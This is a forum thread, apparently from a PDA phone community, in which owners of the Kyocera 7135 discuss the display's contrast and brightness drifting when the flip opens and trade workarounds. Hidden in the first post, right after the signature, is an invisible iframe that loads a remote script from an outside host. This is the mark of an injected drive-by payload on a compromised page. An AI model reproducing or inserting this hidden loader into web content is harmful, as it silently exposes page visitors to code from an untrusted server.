+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Does brightness dim on anyone else's 7135?

Hi All,

I have had my 7135 for two days now and I have noticed something that concerns me. Sometimes when I open the flip-top of the 7135 I find the display is somewhat dimmer than when I left it. I find that I have to adjust the contrast and brightness a bit to get it back to it's previous setting.

Has anyone had this or similar behavior happen with their 7135? Any thoughts? Thanks you.

- Derek<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This will happen if your phone does a soft reset.

Derek, I'm having a similar problem. It's only the contrast though! You will also notice, that when you open the flip and although the contrast is changed, the slider has not moved at all. Moving the slider a few mm it will then reengage at its intended contrast.

Is this what you're seeing (or are you seeing something else)?

Originally posted by bones boy
    Derek, I'm having a similar problem. It's only the contrast though! You will also notice, that when you open the flip and although the contrast is changed, the slider has not moved at all. Moving the slider a few mm it will then reengage at its intended contrast.

Yes, I've seen that as well.

Andrew

I've noticed the contrast change and it is usually lessened (lighter). I keep it high contrast because it appears to be darker and may use less power. Am I right?

I keep brightness turned down -- all of the way to the left.

You are correct Beryl.

The contrast glitch is a small nusiance, I thought it was just me. I will probably shoot a letter off to Kyo's FAB tech support and see what they have to say...

Illegitimis nil carborundum DanDiego's Avatar

Brightness & Contrast wander

I'm seeing the same thing. Sometime when I open the flip, the brightness & contrast settings seem to have wandered from where I last set them. Thanks for posting this.

Could it be that the "wander" is caused by battery drain? In other words, you might need different settings to acheive the same brightness when the battery is 1/2 charged than when its fully charged?

Originally posted by bones boy

Bones Boy... You described exactly what I am experiencing. After closer examination it looks like the contrast is what is changing.

- Derek

Neither brightness nor contrast has ever "moved" on my 7135. I did note though that if I adjust contrast to far away from the middle, the screen darkens to an unreadable level. Anyone else experience this?

mine has never moved

For what it's worth, mine have never moved by themselves, either.
    ~'kito
    pdaPhoneHome Moderator

I too have noticed this phenomenum. A minor irritation. It appears to be contrast rather than brightness that has changed, but the slider position does not change. Sometimes I can see it change even with the flip open. Does anyone that has talked to or sent email to Kyo received a response?

John
    John

For more information see barJohn Reviews It

Mine will come on 'brighter' every 20-30 flip openings. I have found that closing and reopening it will correct the problem.

Oddly enough, this did not happen with my first 7135. I had been wondering if restoring the prefs from the first 7135 to this one had something to do with it.

Folks,

I have seen this as well. The contrast slider position won't move, but the internal setting will become out of sync with the slider and the screen gets paler.

When you open the contrast slider and move it just a smidge...the screen get's back to where it should be.

It is possible this is happening with a soft reset, however I have not done one in a few days. The phone could be doing this itself several times a day (for all I know). My 6135 used to do that.

Glenn

Solution - to the contrast issue

Not sure if this works all the time but I to had this problem. I noticed that if I fixed the contrast using the contrast corner in the screen above the keys the problem would occur again when a I opened the phone. But then I went into PDA preferences and fixed the contrast and that seemed to work. My contrast no longer changes when I open the phone.
    pvm

My 7135 does the same thing as discribed in this thread, what can we do about this???

Re: Solution - to the contrast issue

Originally posted by pvm21
    Not sure if this works all the time but I to had this problem. I noticed that if I fixed the contrast using the contrast corner in the screen above the keys the problem would occur again when a I opened the phone. But then I went into PDA preferences and fixed the contrast and that seemed to work. My contrast no longer changes when I open the phone.
    I tried it this way and although it worked for a while, the problem then appeared again. All I needed to do was close and open the flip and it reset itself, however, it is a bit annoying. Has anyone heard from Kyocera about this or heard of a fix for this?

Re: Re: Solution - to the contrast issue

Originally posted by RMSko
    All I needed to do was close and open the flip and it reset itself, however, it is a bit annoying.
    A faster and easier "fix" -- turn the palm off and on again (little light bulb key).

I've never had this problem. I wonder if its an indicator of a "problem phone". In other words, is there any correlation between phones with this issue and phones that lock up frequently or have the caller ID problem?